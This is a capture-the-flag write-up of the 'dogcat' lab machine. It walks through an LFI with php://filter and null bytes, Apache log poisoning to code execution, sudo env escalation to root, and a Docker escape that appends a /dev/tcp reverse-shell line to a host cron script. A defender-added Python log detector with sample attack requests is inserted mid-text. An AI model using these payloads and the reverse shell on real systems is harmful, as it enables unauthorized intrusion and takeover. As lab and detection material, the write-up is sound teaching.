Enumeration
Started by checking what ports are open:
root@osboxes:~/Documents/dogcat# cat scan.txt
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
| 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_ 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL: 0
Furious: 48
Nmap: 13
Total: 61
User
Then opened the website and saw a possible LFI attack vector:
Tried opening /etc/passwd but got “only dogs or cats are allowed”:
Then tried opening it again with “cat” in the path, using a null byte:
It seems that it is using something similar to:
Used the PHP wrapper to show the content of index.php in base64 encoding:
Decoded the string and got the source code:
We can use the parameter ext to avoid “.php” being appended. Then performed an Apache log poisoning attack to upgrade the LFI to RCE:
Encoded a reverse shell with URL encoding and then executed it through that RCE:
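Defender-side addition, not part of the original write-up: a small Python detector that runs over constructed Apache access-log lines and flags the request patterns used above (php:// wrappers, null bytes, traversal, the ext override, and a PHP tag in the User-Agent, which is what log poisoning relies on). The log lines and indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-format access log lines (not from the write-up).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2020:12:10:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Aug/2020:12:10:07 +0000] "GET /?view=cat/../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "curl/7.68.0"
10.0.0.9 - - [05/Aug/2020:12:10:12 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.0.0.9 - - [05/Aug/2020:12:10:20 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 4096 "-" "<?php echo 'x'; ?>"
10.0.0.7 - - [05/Aug/2020:12:11:00 +0000] "GET /?view=cat HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def indicators(path: str, ua: str) -> list:
    """Return the names of LFI / log-poisoning indicators present in one request."""
    p = unquote(path)  # decode once so %00 becomes NUL and %2e%2e%2f becomes ../
    found = []
    if "php://" in p.lower():
        found.append("php_wrapper")        # php://filter etc. used to read source
    if "\x00" in p:
        found.append("null_byte")          # attempt to cut off an appended ".php"
    if "../" in p or "..\\" in p:
        found.append("traversal")          # escaping the intended include directory
    if re.search(r"[?&]ext=", p):
        found.append("ext_override")       # the ext parameter that disables the suffix
    if "/var/log/" in p:
        found.append("log_file_include")   # including the web server's own log
    if "<?" in ua:
        found.append("php_tag_in_ua")      # PHP code planted in the User-Agent
    return found

def analyze(log_text: str) -> list:
    """Parse each log line and return the requests that carry at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = indicators(m["path"], m["ua"])
        if hits:
            findings.append({"ip": m["ip"], "path": m["path"], "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ip"], ", ".join(f["indicators"]), f["path"])
```

Feeding it a real access.log instead of SAMPLE_LOG gives a quick triage list; the php_tag_in_ua hit is the one to act on first, because the log is now poisoned and any later include of it executes that code.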
Root
Checked whether www-data has sudo permissions:
www-data@bc2d166cba99:/var/www/html$ sudo -l
Matching Defaults entries for www-data on bc2d166cba99:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on bc2d166cba99:
(root) NOPASSWD: /usr/bin/env
We can get a shell using /usr/bin/env according to GTFOBins:
www-data@bc2d166cba99:/var/www/html$ sudo env /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
Docker
Used linpeas to enumerate how to get the 4th flag (since we are inside a Docker container):
It seems there is a cron job on the real host that creates backups using /opt/backups/backup.sh:
root@d4871bd286e0:/opt/backups# ls -l
total 5884
-rwxr--r-- 1 root root 111 Aug 5 12:09 backup.sh
-rw-r--r-- 1 root root 6021120 Aug 5 13:31 backup.tar
root@d4871bd286e0:/opt/backups# cat backup.sh
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
Appended a reverse shell to the end of the file:
root@d4871bd286e0:/opt/backups# echo "bash -i >& /dev/tcp/10.9.31.216/5555 0>&1" >> backup.sh
root@d4871bd286e0:/opt/backups# cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
bash -i >& /dev/tcp/10.9.31.216/5555 0>&1
And got the shell:
root@osboxes:~/Documents/dogcat# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.9.31.216] from (UNKNOWN) [10.10.32.79] 48636
bash: cannot set terminal process group (5306): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls
container
flag4.txt
root@dogcat:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:5f:6d:d3:53:60 brd ff:ff:ff:ff:ff:ff
inet 10.10.32.79/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2719sec preferred_lft 2719sec
inet6 fe80::5f:6dff:fed3:5360/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:58:bd:55:be brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:58ff:febd:55be/64 scope link
valid_lft forever preferred_lft forever
5: veth8e8f886@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 2a:07:5a:c8:77:b0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::2807:5aff:fec8:77b0/64 scope link
valid_lft forever preferred_lft forever